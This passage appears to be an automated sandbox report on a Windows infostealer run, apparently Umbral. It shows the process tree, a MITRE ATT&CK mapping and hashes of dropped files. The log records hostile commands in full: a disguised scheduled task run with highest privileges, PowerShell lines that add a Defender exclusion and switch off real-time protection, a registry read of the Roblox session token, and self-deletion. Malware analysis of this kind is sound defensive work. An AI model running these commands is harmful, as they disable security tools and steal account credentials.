  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:1792
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1740
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:436
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4524
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:2172
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3688
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:4780
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3776
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:3436
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5796
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:5380
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1772
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:4036
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5448
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:4156
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1904
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:4224
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2740
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:4824
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4872
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:4996
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:368
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:3472
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2632
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:4860
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5960
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:1596
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1408
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:3056
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5196
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:6064
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3292
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:5820
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2656
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:5836
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:436
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:5276
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3872
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:2828
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3304
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:4424
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1528
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:2332
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5644
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:1904
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4000
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:6140
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4864
- - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4820
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3652
  - - C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      4⤵
      Views/modifies file attributes
      PID:4896
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3804
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3716
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1092
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:464
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4132
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:1220
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:1228
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5760
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2076
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Suspicious use of WriteProcessMemory
      PID:3948
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2948

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4772

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7bdab578527f95dc0e8f22ccd7e7e6b3

SHA1
c33b6fa4c9a91c8d872c8098fc17c5327d6f7d8e

SHA256
bfc7fbf9caa912ee3ef7a5e17648a1f7757e9d2a6efb5abb3f3eabc461a448b1

SHA512
f790f323f4cbfad87ad1b070648a88e23b11621e52d5d64f489e2d14e3b929f4697cc9dacadec7a7224577377c0e9d53c2c1f96b87fc975ae9e4cb775021ecd5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a1a5cd54a073fcc6f996c5bf8eae9ab4

SHA1
f51b3b1fe5ec1ace8641c99d2769a0f9f93f640f

SHA256
d0cc04ed0b546b1d7f405da38b5c1addd1fbc26591027e76b9745a9c1daf584e

SHA512
6804bc8a338f7727396b107ee58e418dae2c086aa85c8edb4d4a90f7398963dc63bab06574ed8b3c593e76d7740ecacec63d1643c6f26058a5d947caafb7673c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
6a29e9f9eb72c3bffbb054cd27e3ceea

SHA1
d38f7c2ad68dcf1d24deca9792256ff53d5218b2

SHA256
7a9f831f96b9e4843751dea3ed57ee11d70bb83a5970ddf9d6bd440f4def442c

SHA512
b4826f172c6ac60ad17412a634987c45640b1b8fe03aecba26510ae224685bcd571bc4b131724036e2b502b3a8198fb69414be8c72e46f833f0601a15d313430

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
218KB

MD5
4915447de5b61cfdf3647360f080efc2

SHA1
c2db4084c9155f8eb2f42996b197516d6633868c

SHA256
edc8486279c293a3526c71a9c397dccd3e3d9c0c766226252d35991b4ddbf09a

SHA512
c68c0d5403a33aff6c7a96670c2db661e3cd97d80bc58325410e0bb2c51609a3ea86c184dc3bfc8a0da95fbb4119b89c8aa2f74221a35bcf3f66a149914ed13f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Everything-1.4.1.1026.x64-Setup.exe

Filesize
10KB

MD5
aad0d299fc82a3973c0c74e538bd5621

SHA1
6ea38c329659bdb690d9d98b0de238a6beca3297

SHA256
79e5373835035d1dcb16e9138f2f3ad2909937ca57385511c89ca288e7988965

SHA512
d16d5c3caf9c6ae42b709c8f25688c48569225966c3ddf768025565681b72efbfe0616a7ece7b53a433fabc904af6407fb0ad839636b14dc900b2660a73d7f89

Download Submit
C:\Users\Admin\AppData\Local\Temp\Result.exe

Filesize
489KB

MD5
0e91bb19fee25d517021594ba5a0362f

SHA1
7e2fd585845b1fdad31276cbd102fedbe1128779

SHA256
a94ee0dfc6a4e793b3d58b5c05daddb4ef4816ede9980dee7591889cba0cc0b9

SHA512
0c6ea7e7ca41ac6d2080ac3fc5206a2b3de946a7b20b7f9af0828462ac09f45315d3edeebb3041637ba35a991ebdb5dd721433c100a4a31e716289c19e6937e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\TimerResolution.exe

Filesize
32KB

MD5
2c9017dbc6c38d2567d550177d64a81d

SHA1
f77de1de8e39c17c299c25696cc7965bfe07028f

SHA256
8a0c6871ec6e09e4193f537884111006a947d7b3e9260110907777d0c4dd68d3

SHA512
244430ea44c510b61351941cd459278e2cd7bf88750643c49b2d710139b3c71b4a35e8379d2dccbce23a15105e1b6ad6c9444875dabaefeb311a45a9a0fc580a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Umbral.exe

Filesize
229KB

MD5
81ade106b7eed372ccfd089aa4980409

SHA1
0987467ac38ba6330e370fd99b1c68e5f274c169

SHA256
dd92a068c1839fa3df94d8534d741573c06cfdfd93cef08b4e4d3091bc8e057f

SHA512
539941d93b9e1c8695478128560648c2c6d199293935f7832100c273212fc38a5e349bf3bfc6b6d08c6bab0a2cc465b3e6a56c0478ccb14d2c2d386f4e83efb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lywnksnz.0ar.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\xdwd.dll

Filesize
136KB

MD5
16e5a492c9c6ae34c59683be9c51fa31

SHA1
97031b41f5c56f371c28ae0d62a2df7d585adaba

SHA256
35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66

SHA512
20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

Download Submit
memory/516-50-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3804-54-0x000002E66A500000-0x000002E66A522000-memory.dmp

Filesize
136KB

Download
memory/4696-48-0x0000000000D10000-0x0000000000D4C000-memory.dmp

Filesize
240KB

Download
memory/4696-1225-0x0000000001580000-0x000000000158C000-memory.dmp

Filesize
48KB

Download
memory/4820-78-0x000001D2C8AC0000-0x000001D2C8B36000-memory.dmp

Filesize
472KB

Download
memory/4820-79-0x000001D2C8A40000-0x000001D2C8A90000-memory.dmp

Filesize
320KB

Download
memory/4820-80-0x000001D2B00C0000-0x000001D2B00DE000-memory.dmp

Filesize
120KB

Download
memory/4820-53-0x000001D2AE320000-0x000001D2AE360000-memory.dmp

Filesize
256KB

Download
memory/4820-116-0x000001D2B0100000-0x000001D2B010A000-memory.dmp

Filesize
40KB

Download
memory/4820-117-0x000001D2C8A90000-0x000001D2C8AA2000-memory.dmp

Filesize
72KB

Download
memory/5832-11-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/5868-17-0x0000000000400000-0x0000000000487000-memory.dmp

Filesize
540KB

Download